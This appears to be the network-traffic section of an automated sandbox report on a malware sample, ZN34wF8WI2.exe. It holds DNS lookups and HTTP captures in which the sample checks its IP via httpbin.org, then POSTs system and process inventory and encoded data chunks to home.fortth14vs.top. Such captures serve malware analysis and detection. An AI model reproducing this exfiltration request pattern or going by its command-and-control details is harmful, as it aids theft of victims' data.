                                Dec 31, 2024 09:44:14.107187033 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.107194901 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.107204914 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.107213020 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.107222080 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.107230902 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.107239008 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.107248068 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.107274055 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.107281923 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.107290983 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.107300043 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.107321024 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.107330084 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.107338905 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.107347965 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.107356071 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.107364893 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.107372999 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.107381105 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.107439995 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.112524986 CET4970580192.168.2.791.149.241.220
                                Dec 31, 2024 09:44:14.117357969 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117368937 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117466927 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117475986 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117486000 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117495060 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117512941 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117522001 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117531061 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117539883 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117548943 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117556095 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117577076 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117585897 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117600918 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117609978 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117618084 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117729902 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117825031 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117844105 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117852926 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117861986 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117871046 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117878914 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117887974 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117897987 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117907047 CET804970591.149.241.220192.168.2.7
                                Dec 31, 2024 09:44:14.117923021 CET804970591.149.241.220192.168.2.7
                                 Dec 31, 2024 09:44:14.117932081 CET | 80 | 49705 | 91.149.241.220 | 192.168.2.7
                                 Dec 31, 2024 09:44:14.117943048 CET | 80 | 49705 | 91.149.241.220 | 192.168.2.7
                                 Dec 31, 2024 09:44:16.825931072 CET | 80 | 49705 | 91.149.241.220 | 192.168.2.7
                                 Dec 31, 2024 09:44:16.826073885 CET | 80 | 49705 | 91.149.241.220 | 192.168.2.7
                                 Dec 31, 2024 09:44:16.826117992 CET | 49705 | 80 | 192.168.2.7 | 91.149.241.220
                                 Dec 31, 2024 09:44:16.826389074 CET | 49705 | 80 | 192.168.2.7 | 91.149.241.220
                                 Dec 31, 2024 09:44:16.831228971 CET | 80 | 49705 | 91.149.241.220 | 192.168.2.7
                                 Dec 31, 2024 09:44:16.935791016 CET | 49707 | 53 | 192.168.2.7 | 1.1.1.1
                                 Dec 31, 2024 09:44:16.940773010 CET | 53 | 49707 | 1.1.1.1 | 192.168.2.7
                                 Dec 31, 2024 09:44:16.940844059 CET | 49707 | 53 | 192.168.2.7 | 1.1.1.1
                                 Dec 31, 2024 09:44:16.941081047 CET | 49707 | 53 | 192.168.2.7 | 1.1.1.1
                                 Dec 31, 2024 09:44:16.945867062 CET | 53 | 49707 | 1.1.1.1 | 192.168.2.7
                                 Dec 31, 2024 09:44:17.595194101 CET | 53 | 49707 | 1.1.1.1 | 192.168.2.7
                                 Dec 31, 2024 09:44:17.595626116 CET | 49707 | 53 | 192.168.2.7 | 1.1.1.1
                                 Dec 31, 2024 09:44:17.600532055 CET | 53 | 49707 | 1.1.1.1 | 192.168.2.7
                                 Dec 31, 2024 09:44:17.600606918 CET | 49707 | 53 | 192.168.2.7 | 1.1.1.1
                                 Dec 31, 2024 09:44:17.723851919 CET | 49713 | 80 | 192.168.2.7 | 91.149.241.220
                                 Dec 31, 2024 09:44:17.728709936 CET | 80 | 49713 | 91.149.241.220 | 192.168.2.7
                                 Dec 31, 2024 09:44:17.728794098 CET | 49713 | 80 | 192.168.2.7 | 91.149.241.220
                                 Dec 31, 2024 09:44:17.729161978 CET | 49713 | 80 | 192.168.2.7 | 91.149.241.220
                                 Dec 31, 2024 09:44:17.739372969 CET | 80 | 49713 | 91.149.241.220 | 192.168.2.7
                                 Dec 31, 2024 09:44:18.480685949 CET | 80 | 49713 | 91.149.241.220 | 192.168.2.7
                                 Dec 31, 2024 09:44:18.480726004 CET | 80 | 49713 | 91.149.241.220 | 192.168.2.7
                                 Dec 31, 2024 09:44:18.480806112 CET | 49713 | 80 | 192.168.2.7 | 91.149.241.220
                                 Dec 31, 2024 09:44:18.481225014 CET | 49713 | 80 | 192.168.2.7 | 91.149.241.220
                                 Dec 31, 2024 09:44:18.486129045 CET | 80 | 49713 | 91.149.241.220 | 192.168.2.7
                                 Dec 31, 2024 09:44:19.647449970 CET | 49728 | 80 | 192.168.2.7 | 91.149.241.220
                                 Dec 31, 2024 09:44:19.652304888 CET | 80 | 49728 | 91.149.241.220 | 192.168.2.7
                                 Dec 31, 2024 09:44:19.652384996 CET | 49728 | 80 | 192.168.2.7 | 91.149.241.220
                                 Dec 31, 2024 09:44:19.652730942 CET | 49728 | 80 | 192.168.2.7 | 91.149.241.220
                                 Dec 31, 2024 09:44:19.657556057 CET | 80 | 49728 | 91.149.241.220 | 192.168.2.7
                                 Dec 31, 2024 09:44:20.520076990 CET | 80 | 49728 | 91.149.241.220 | 192.168.2.7
                                 Dec 31, 2024 09:44:20.520092010 CET | 80 | 49728 | 91.149.241.220 | 192.168.2.7
                                 Dec 31, 2024 09:44:20.520255089 CET | 49728 | 80 | 192.168.2.7 | 91.149.241.220
                                 Dec 31, 2024 09:44:20.520853043 CET | 49728 | 80 | 192.168.2.7 | 91.149.241.220
                                 Dec 31, 2024 09:44:20.526086092 CET | 80 | 49728 | 91.149.241.220 | 192.168.2.7
                                 Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                 Dec 31, 2024 09:44:09.784519911 CET | 62202 | 53 | 192.168.2.7 | 1.1.1.1
                                 Dec 31, 2024 09:44:09.784682035 CET | 62202 | 53 | 192.168.2.7 | 1.1.1.1
                                 Dec 31, 2024 09:44:09.791661024 CET | 53 | 62202 | 1.1.1.1 | 192.168.2.7
                                 Dec 31, 2024 09:44:09.791676044 CET | 53 | 62202 | 1.1.1.1 | 192.168.2.7
                                 Dec 31, 2024 09:44:12.638474941 CET | 62579 | 53 | 192.168.2.7 | 1.1.1.1
                                 Dec 31, 2024 09:44:12.638550997 CET | 62579 | 53 | 192.168.2.7 | 1.1.1.1
                                 Dec 31, 2024 09:44:13.408540010 CET | 53 | 62579 | 1.1.1.1 | 192.168.2.7
                                 Dec 31, 2024 09:44:13.542042017 CET | 53 | 62579 | 1.1.1.1 | 192.168.2.7
                                 Dec 31, 2024 09:44:16.928581953 CET | 58989 | 53 | 192.168.2.7 | 1.1.1.1
                                 Dec 31, 2024 09:44:16.928652048 CET | 58989 | 53 | 192.168.2.7 | 1.1.1.1
                                 Dec 31, 2024 09:44:16.935342073 CET | 53 | 58989 | 1.1.1.1 | 192.168.2.7
                                 Dec 31, 2024 09:44:17.722835064 CET | 53 | 58989 | 1.1.1.1 | 192.168.2.7
                                 Dec 31, 2024 09:44:18.553672075 CET | 58991 | 53 | 192.168.2.7 | 1.1.1.1
                                 Dec 31, 2024 09:44:18.553725004 CET | 58991 | 53 | 192.168.2.7 | 1.1.1.1
                                 Dec 31, 2024 09:44:19.036235094 CET | 53 | 58991 | 1.1.1.1 | 192.168.2.7
                                 Dec 31, 2024 09:44:19.646541119 CET | 53 | 58991 | 1.1.1.1 | 192.168.2.7
                                 Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                 Dec 31, 2024 09:44:09.784519911 CET | 192.168.2.7 | 1.1.1.1 | 0xca54 | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
                                 Dec 31, 2024 09:44:09.784682035 CET | 192.168.2.7 | 1.1.1.1 | 0xc6df | Standard query (0) | httpbin.org | 28 (AAAA) | IN (0x0001) | false
                                 Dec 31, 2024 09:44:12.638474941 CET | 192.168.2.7 | 1.1.1.1 | 0x89c9 | Standard query (0) | home.fortth14vs.top | A (IP address) | IN (0x0001) | false
                                 Dec 31, 2024 09:44:12.638550997 CET | 192.168.2.7 | 1.1.1.1 | 0xe944 | Standard query (0) | home.fortth14vs.top | 28 (AAAA) | IN (0x0001) | false
                                 Dec 31, 2024 09:44:16.928581953 CET | 192.168.2.7 | 1.1.1.1 | 0x9790 | Standard query (0) | home.fortth14vs.top | A (IP address) | IN (0x0001) | false
                                 Dec 31, 2024 09:44:16.928652048 CET | 192.168.2.7 | 1.1.1.1 | 0xab95 | Standard query (0) | home.fortth14vs.top | 28 (AAAA) | IN (0x0001) | false
                                 Dec 31, 2024 09:44:16.941081047 CET | 192.168.2.7 | 1.1.1.1 | 0xab95 | Standard query (0) | home.fortth14vs.top | 28 (AAAA) | IN (0x0001) | false
                                 Dec 31, 2024 09:44:18.553672075 CET | 192.168.2.7 | 1.1.1.1 | 0xdc4d | Standard query (0) | home.fortth14vs.top | A (IP address) | IN (0x0001) | false
                                 Dec 31, 2024 09:44:18.553725004 CET | 192.168.2.7 | 1.1.1.1 | 0xc146 | Standard query (0) | home.fortth14vs.top | 28 (AAAA) | IN (0x0001) | false
                                 Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                 Dec 31, 2024 09:44:09.791661024 CET | 1.1.1.1 | 192.168.2.7 | 0xca54 | No error (0) | httpbin.org | | 34.197.122.172 | A (IP address) | IN (0x0001) | false
                                 Dec 31, 2024 09:44:09.791661024 CET | 1.1.1.1 | 192.168.2.7 | 0xca54 | No error (0) | httpbin.org | | 34.200.57.114 | A (IP address) | IN (0x0001) | false
                                 Dec 31, 2024 09:44:13.542042017 CET | 1.1.1.1 | 192.168.2.7 | 0x89c9 | No error (0) | home.fortth14vs.top | | 91.149.241.220 | A (IP address) | IN (0x0001) | false
                                 Dec 31, 2024 09:44:17.722835064 CET | 1.1.1.1 | 192.168.2.7 | 0x9790 | No error (0) | home.fortth14vs.top | | 91.149.241.220 | A (IP address) | IN (0x0001) | false
                                 Dec 31, 2024 09:44:19.036235094 CET | 1.1.1.1 | 192.168.2.7 | 0xdc4d | No error (0) | home.fortth14vs.top | | 91.149.241.220 | A (IP address) | IN (0x0001) | false
                                • httpbin.org
                                • home.fortth14vs.top
                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                 0 | 192.168.2.7 | 49705 | 91.149.241.220 | 80 | 6040 | C:\Users\user\Desktop\ZN34wF8WI2.exe
                                 Timestamp | Bytes transferred | Direction | Data
                                 Dec 31, 2024 09:44:13.549916983 CET | 12360 | OUT | POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
                                Host: home.fortth14vs.top
                                Accept: */*
                                Content-Type: application/json
                                Content-Length: 560612
                                Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 39 38 32 31 37 36 35 32 39 31 34 33 33 35 34 34 39 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                Data Ascii: { "ip": "8.46.123.189", "current_time": "8598217652914335449", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 632 }, { "name": "svchost.exe", "pid": 748 }, { "name": "fontdrvhost.exe", "pid": 772 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "svchost.exe", "pid": 864 }, { "name": "svchost.exe", "pid": 912 }, { "name": "dwm.exe", "pid": 976 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 704 }, { "name": "svchost.exe", "pid": 860 }, { "name": "svchost.exe" [TRUNCATED]
                                 Dec 31, 2024 09:44:13.555141926 CET | 7416 | OUT | Data Raw: 31 39 66 66 44 43 77 2b 48 5c 2f 78 31 2b 49 66 77 35 38 4d 47 37 6e 76 62 6d 5c 2f 31 4c 56 50 44 56 31 6f 6e 68 72 53 6f 6e 38 51 33 74 33 63 58 64 72 71 72 79 51 36 31 4a 5c 2f 70 56 70 66 58 6e 35 71 56 5c 2f 55 50 68 52 34 75 63 4a 2b 4c 33
                                Data Ascii: 19ffDCw+H\/x1+Ifw58MG7nvbm\/1LVPDV1onhrSon8Q3t3cXdrqryQ61J\/pVpfXn5qV\/UPhR4ucJ+L3D\/wDbfDdedHE4aUKOcZJjJU45nk+KnFyhDEU4SlGrhsQozlgsdRvh8VGFSKdPE0MTh6H8feMvghxr4G8Tvh\/ivD06+ExkJ4jIuIcDGrLKM9wlOSjOphatSMZUcXhnOEMfl1dRxODnOlNqrhcRhMVia9FWKg2P7f
                                 Dec 31, 2024 09:44:13.555217981 CET | 17304 | OUT | Data Raw: 6a 55 6c 49 77 4c 66 6e 6d 76 39 37 44 5c 2f 6d 6c 49 4b 4b 6c 32 44 33 5c 2f 77 41 5c 2f 68 52 73 48 76 5c 2f 6e 38 4b 41 4f 4a 38 63 65 4c 6c 38 47 61 52 44 71 6a 57 44 61 69 5a 37 2b 47 77 53 33 46 79 4c 51 42 70 59 4c 6d 34 4d 6a 54 47 43 35
                                Data Ascii: jUlIwLfnmv97D\/mlIKKl2D3\/wA\/hRsHv\/n8KAOJ8ceLl8GaRDqjWDaiZ7+GwS3FyLQBpYLm4MjTGC5wqpasNoiYszKMqMkfeP7En\/BaT\/hjj4U+IPhj\/wAM2f8ACxv7d+IWq+O\/7b\/4XF\/wiH2X+0\/DnhPw\/wD2V\/Zv\/Cq\/FHn+R\/wi\/wBr+3fb4fN+3fZ\/scf2bzrj83PjooHhLTiM\/wDIx2n\/AKbN
                                 Dec 31, 2024 09:44:13.560146093 CET | 4944 | OUT | Data Raw: 50 5c 2f 41 4e 63 65 76 36 6f 66 4c 38 7a 2b 5c 2f 77 44 39 73 76 38 41 55 38 66 35 5c 2f 4d 30 39 66 39 79 54 33 38 7a 39 78 5c 2f 6e 67 2b 33 4e 48 79 79 4e 4d 37 70 76 66 7a 66 33 58 2b 65 33 2b 65 42 57 5a 30 44 50 4c 64 66 4f 5c 2f 76 78 5c
                                Data Ascii: P\/ANcev6ofL8z+\/wD9sv8AU8f5\/M09f9yT38z9x\/ng+3NHyyNM7pvfzf3X+e3+eBWZ0DPLdfO\/vx\/9Mv1\/rRI0yyJD\/B\/z8f1wKEj3b9jl\/wDtr7frnNN2\/MjpDgf6qXzP8\/lWntPL8f8AgAQx\/vJPL2RzJH9ol80\/uPO7\/wCOafJn93v+5\/n\/AEW7qXcn3Ngx5v8Ay7xeR\/nNQxyPj+4kf+q\/fXX\/A
                                 Dec 31, 2024 09:44:13.560184002 CET | 7416 | OUT | Data Raw: 48 78 44 38 54 74 48 52 6f 37 64 4c 69 2b 6c 73 45 6b 34 39 51 38 5a 65 45 39 4a 38 49 5c 2f 45 44 34 67 66 43 69 30 2b 4e 48 77 4b 38 64 66 45 33 34 56 61 52 38 57 74 56 2b 49 66 67 58 77 54 65 66 48 74 74 61 38 4f 53 66 42 54 77 68 71 66 6a 6e
                                Data Ascii: HxD8TtHRo7dLi+lsEk49Q8ZeE9J8I\/ED4gfCi0+NHwK8dfE34VaR8WtV+IfgXwTefHtta8OSfBTwhqfjnx3pC3\/jL9nfwZ4T1vVrTw\/omt3NmugeJtT065bSbwSalbxm1lufw6Pg79ESp71PiPNKtK2cyWIo5tnNXCSpcPTpUs9xMcXTyuWFlg8oq1qNLMcbGs8JhKtSFOtWhOSif0rW8dfp2YarLD4rhTJ8LioYjLsHUwOK
                                 Dec 31, 2024 09:44:13.560219049 CET | 2472 | OUT | Data Raw: 66 78 58 48 5c 2f 50 33 31 5c 2f 77 41 50 63 31 44 35 68 6a 6a 52 39 6e 48 6c 66 36 76 38 7a 2b 66 2b 65 6e 46 57 6d 6a 2b 35 38 38 61 66 75 76 4b 37 2b 76 38 41 78 39 66 39 66 76 72 6e 30 34 70 4a 4e 6e 6d 62 32 2b 52 50 2b 65 63 66 2b 66 30 2b
                                Data Ascii: fxXH\/P31\/wAPc1D5hjjR9nHlf6v8z+f+enFWmj+588afuvK7+v8Ax9f9fvrn04pJNnmb2+RP+ecf+f0+tB0U6m+n9d1\/XbUp\/wDLREV5H7f9MP58YoaP76BP+mX7uX9xU3l\/NM\/kl\/L+vkfz5pny8fIJv3Xmyx+b+fX60F878v6+Yzckaun338r91HH+v9KrbZEXfs+f\/pn+4\/z27nFTSbJG8n+Mxf5\/yelDMn7l9
                                 Dec 31, 2024 09:44:13.603216887 CET | 34608 | OUT | Data Raw: 61 61 78 38 50 38 41 78 70 38 45 50 46 66 67 2b 58 39 6f 4c 34 75 33 65 69 65 45 5c 2f 68 72 72 50 77 4f 2b 4c 52 38 63 65 4c 66 44 5c 2f 69 37 34 36 57 76 6a 6d 33 38 64 58 5c 2f 78 65 31 36 44 78 7a 62 36 44 71 6e 68 4b 33 38 52 61 47 75 6c 72
                                Data Ascii: aax8P8Axp8EPFfg+X9oL4u3eieE\/hrrPwO+LR8ceLfD\/i746Wvjm38dX\/xe16Dxzb6DqnhK38RaGulra+A37Ss97+xv4d+A3wp1\/wCAvw6SLS\/2ntB+OXwy+NFl+3xoXxD+KvjDxp8XvGnjrwF8XvhbZfBfxDe\/saeP9YvvAGveAdB8K63+1D4E0T4i\/CvxZ8O4LG11iTwjp\/g250j12fw74fupGmudC0e4mb70s+mW
                                 Dec 31, 2024 09:44:13.651026011 CET | 1236 | OUT | Data Raw: 5c 2f 6e 36 5c 2f 53 74 44 51 5a 48 4a 39 78 4e 6d 78 50 2b 57 76 30 35 7a 6b 65 74 4d 58 5a 38 79 62 4a 48 53 54 39 37 2b 37 6c 5c 2f 63 66 6a 5c 2f 38 41 71 5c 2f 72 54 5c 2f 4a 78 49 6e 6e 4a 73 54 5c 2f 57 39 66 33 5c 2f 5c 2f 41 46 37 65 32
                                Data Ascii: \/n6\/StDQZHJ9xNmxP+Wv05zketMXZ8ybJHST97+7l\/cfj\/8Aq\/rT\/JxInnJsT\/W9f3\/\/AF7e2en8qf5e3Yjp8nlfupJP9RB1\/n+tB0Fba7K6fvEST96I7fv259f6+nrCwf8Aj+RP9VEI\/Tr+J\/yKteTx8n3PK8r7Pn\/R5un+f\/rcVB8nl\/O+x\/8AW9fP\/X0xx+HNBt7\/APd\/Eh\/uO77H\/wCWWO\/v\
                                 Dec 31, 2024 09:44:13.700309992 CET | 1236 | OUT | Data Raw: 6e 78 5c 2f 48 6a 31 46 50 6b 2b 56 6e 54 66 76 78 2b 39 38 76 38 41 7a 6e 70 31 5c 2f 77 41 6a 4e 61 53 54 48 79 49 35 66 39 31 2b 39 66 38 41 31 5c 2f 4e 35 5c 2f 77 41 76 58 31 5c 2f 55 63 66 69 41 43 37 39 7a 34 38 76 5c 2f 41 46 76 6c 66 36
                                Data Ascii: nx\/Hj1FPk+VnTfvx+98v8Aznp1\/wAjNaSTHyI5f91+9f8A1\/N5\/wAvX1\/UcfiAC79z48v\/AFvlf6R\/zw\/z\/ifdn+r37E2Px+883+f+cj8qs\/K0ifPsST97L\/X36\/5OarCMsm\/ZvQ\/5\/wA\/05oAX5I5N+ze8Z\/e+X\/r4eM\/zqP5Y2fyU8n\/AJZeZ5vnz\/h9fy\/Kptv7t3TzHT\/VS5x++\/z\/AJ91
                                 Dec 31, 2024 09:44:13.747025967 CET | 1236 | OUT | Data Raw: 2b 43 6e 37 45 66 37 4a 76 78 6c 75 66 46 46 33 72 33 78 6f 30 37 34 37 5c 2f 73 44 51 66 74 56 5c 2f 44 33 34 77 58 47 75 61 67 5a 39 59 38 52 2b 46 5c 2f 69 56 38 4f 64 4f 50 78 59 38 4b 36 5c 2f 4e 44 39 6f 76 74 51 30 62 57 76 44 49 73 72 76
                                Data Ascii: +Cn7Ef7JvxlufFF3r3xo0747\/sDQftV\/D34wXGuagZ9Y8R+F\/iV8OdOPxY8K6\/ND9ovtQ0bWvDIsrvWJ4Z4vEzTXGrajN\/LuzM7M7szOzFmZiWZmY5ZmY5JYkkkk5J5NNrwMV4j55isZicRPD5W8JXqe0jlzwFKFKlyQpUcO\/reEWEzGdShh6FDDxqPFpTo01RnB0X7I+2yX6J3hzk2QZRllDM+MlneWYNYWrxVHiTG4n
                                 Dec 31, 2024 09:44:13.795793056 CET | 1236 | OUT | Data Raw: 72 32 7a 75 6a 48 6c 50 69 35 5a 65 49 4c 48 39 67 6a 34 31 4a 34 72 30 79 5c 2f 30 54 78 4e 4c 38 42 39 4a 66 78 44 6f 65 72 50 62 53 61 76 6f 6d 75 51 5c 2f 42 48 77 48 59 36 78 70 4f 72 53 57 58 69 33 78 39 5a 53 61 6c 59 61 6e 61 58 64 74 65
                                Data Ascii: r2zujHlPi5ZeILH9gj41J4r0y\/0TxNL8B9JfxDoerPbSavomuQ\/BHwHY6xpOrSWXi3x9ZSalYanaXdtevZ+O\/G1q06OYPF3iOMrrF57H8CfBviX4XfsrfBb4feMYI7Txd4D+G3wa8IeJ7aC8h1CGDX\/D2i+DtH1eGK\/tnkt72NL61uFS6hkeK4UCVGZXBOT+18c\/ss\/tTn1+H3iA\/n4D0Gv3bIPZUvFTKPquJp4rD1P
                                 Dec 31, 2024 09:44:16.825931072 CET | 157 | IN | HTTP/1.1 200 OK
                                Server: nginx/1.22.1
                                Date: Tue, 31 Dec 2024 08:44:16 GMT
                                Content-Type: text/html; charset=utf-8
                                Content-Length: 1
                                Connection: close
                                Data Raw: 30
                                Data Ascii: 0


                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                 1 | 192.168.2.7 | 49713 | 91.149.241.220 | 80 | 6040 | C:\Users\user\Desktop\ZN34wF8WI2.exe
                                 Timestamp | Bytes transferred | Direction | Data
                                 Dec 31, 2024 09:44:17.729161978 CET | 99 | OUT | GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1
                                Host: home.fortth14vs.top
                                Accept: */*
                                 Dec 31, 2024 09:44:18.480685949 CET | 372 | IN | HTTP/1.1 404 NOT FOUND
                                Server: nginx/1.22.1
                                Date: Tue, 31 Dec 2024 08:44:18 GMT
                                Content-Type: text/html; charset=utf-8
                                Content-Length: 207
                                Connection: close
                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                 2 | 192.168.2.7 | 49728 | 91.149.241.220 | 80 | 6040 | C:\Users\user\Desktop\ZN34wF8WI2.exe
                                 Timestamp | Bytes transferred | Direction | Data
                                 Dec 31, 2024 09:44:19.652730942 CET | 172 | OUT | POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
                                Host: home.fortth14vs.top
                                Accept: */*
                                Content-Type: application/json
                                Content-Length: 31
                                Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                Data Ascii: { "id1": "0", "data": "Done1" }
                                 Dec 31, 2024 09:44:20.520076990 CET | 372 | IN | HTTP/1.1 404 NOT FOUND
                                Server: nginx/1.22.1
                                Date: Tue, 31 Dec 2024 08:44:20 GMT
                                Content-Type: text/html; charset=utf-8
                                Content-Length: 207
                                Connection: close
                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                 0 | 192.168.2.7 | 49704 | 34.197.122.172 | 443 | 6040 | C:\Users\user\Desktop\ZN34wF8WI2.exe
                                 Timestamp | Bytes transferred | Direction | Data
                                 2024-12-31 08:44:10 UTC | 52 | OUT | GET /ip HTTP/1.1
                                Host: httpbin.org
                                Accept: */*
